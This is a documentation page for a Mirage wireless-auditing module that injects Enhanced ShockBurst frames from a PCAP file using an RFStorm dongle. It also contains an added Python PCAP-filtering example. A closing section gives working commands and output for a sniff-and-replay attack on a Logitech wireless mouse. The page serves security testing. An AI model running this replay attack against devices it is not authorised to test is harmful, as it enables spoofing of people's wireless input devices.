esb_inject

Presentation

esb_inject injects Enhanced ShockBurst frames. It works with an RFStorm device. It imports the frames stored in a PCAP file (provided as the PCAP_FILE parameter) and uses the provided interface to inject them.

You specify the target with the TARGET parameter. If no target is provided (or the value provided is “FF:FF:FF:FF:FF”), every frame contained in the PCAP file is transmitted. Otherwise, only the frames corresponding to the provided target are transmitted. You choose the injection channel with the CHANNEL parameter, which accepts the following values:

  • auto: an active scan is performed in order to find the target

  • X: the channel X is used
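Added example, not Mirage's own code: the TARGET selection rule described above, applied to a classic PCAP image carrying the link type 148 that the module reports when it loads a file. It lets you check which addresses a capture contains and which frames a given TARGET value would select. The record layout (5-byte address at the start of each record), the function names and the sample bytes are assumptions made for illustration.

```python
import struct
from collections import Counter

WILDCARD = "FF:FF:FF:FF:FF"  # value the page treats as "no target"
DLT_ESB = 148                # link type shown in the module's log output
ADDR_LEN = 5                 # ASSUMPTION: each record begins with the 5-byte address

def read_pcap(blob):
    """Parse a classic libpcap image; return (linktype, [record payloads])."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(blob[:4])
    if endian is None or len(blob) < 24:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack_from(endian + "I", blob, 20)[0]
    payloads, off = [], 24
    while off + 16 <= len(blob):
        incl_len = struct.unpack_from(endian + "I", blob, off + 8)[0]
        end = off + 16 + incl_len
        if end > len(blob):
            raise ValueError("truncated record body")
        payloads.append(blob[off + 16:end])
        off = end
    return linktype, payloads

def select_frames(blob, target=WILDCARD):
    """Return (frames matching target, Counter of every address seen)."""
    linktype, payloads = read_pcap(blob)
    if linktype != DLT_ESB:
        raise ValueError("unexpected link type %d, wanted %d" % (linktype, DLT_ESB))
    target, seen, selected = target.upper(), Counter(), []
    for payload in payloads:
        if len(payload) < ADDR_LEN:
            seen["malformed"] += 1  # too short to carry an address: never selected
            continue
        addr = ":".join("%02X" % b for b in payload[:ADDR_LEN])
        seen[addr] += 1
        if target in (WILDCARD, addr):  # wildcard selects every well-formed frame
            selected.append(payload)
    return selected, seen

def _record(payload):  # builds one pcap record for the constructed sample
    return struct.pack("<IIII", 0, 0, len(payload), len(payload)) + payload

# Constructed capture (not real traffic): two frames for one address, one for
# another, and one runt record. Bytes after the address are filler.
SAMPLE = (struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, DLT_ESB)
          + _record(bytes.fromhex("E846F92FA4") + b"\x00\xc2")
          + _record(bytes.fromhex("E846F92FA4") + b"\x00\x4f")
          + _record(bytes.fromhex("1122334455") + b"\x00\xc2")
          + _record(b"\x01\x02"))
```

Calling `select_frames(SAMPLE, "E8:46:F9:2F:A4")` returns the two matching frames plus a per-address count for the whole file, while calling it without a target returns every well-formed frame.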

Compatible devices

Input parameters

Name        Default value   Possible values   Description
INTERFACE   rfstorm0        rfstormX          Interface to use
TARGET                      <ESB address>     Address of the target device
CHANNEL     auto            auto|<integer>    Injection channel
PCAP_FILE                   <file path>       PCAP file

Output parameters

This module doesn’t provide any output parameters.

Usage

Basic Usage

To inject frames to a specific target, provide the TARGET parameter:

$ mirage esb_inject TARGET=E8:46:F9:2F:A4 PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_inject loaded !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Sniffing mode enabled !
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[SUCCESS] Channel found: 17
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !

If you don’t provide the TARGET parameter, every frame contained in the PCAP file will be transmitted:

$ mirage esb_inject PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_inject loaded !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Promiscuous mode enabled ! Every frame contained in the file indicated in PCAP_FILE will be transmitted.
[INFO] Looking for an active channel for FF:FF:FF:FF:FF...
[SUCCESS] Channel found: 12
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !

You can select a specific channel with the CHANNEL parameter:

$ mirage esb_inject TARGET=E8:46:F9:2F:A4 PCAP_FILE=/tmp/replay.pcap CHANNEL=12
[INFO] Module esb_inject loaded !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Sniffing mode enabled !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !

Performing a replay attack

This module can be combined with esb_sniff in order to perform a replay attack:

$ mirage "esb_sniff|esb_inject" esb_sniff1.TARGET=E8:46:F9:2F:A4 esb_sniff1.TIME=5 esb_sniff1.PCAP_FILE=/tmp/replay.pcap
[INFO] Module esb_sniff loaded !
[INFO] Module esb_inject loaded !
[INFO] Sniffing mode enabled !
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[INFO] Channels: 0-99
[INFO] Looking for an active channel for E8:46:F9:2F:A4...
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-8 | y=3 >>
[SUCCESS] Channel found: 8
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-7 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-7 | y=1 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=2 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-5 | y=2 >>
[...]
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=255 | y=0 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=3 >>
[PACKET] [ CH:8 ] << ESB - Logitech Mouse Packet (logitech) | address=E8:46:F9:2F:A4 | x=-3 | y=3 >>
[INFO] Sniffing mode enabled !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 148) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[SUCCESS] Injection done !
[INFO] Mirage process terminated !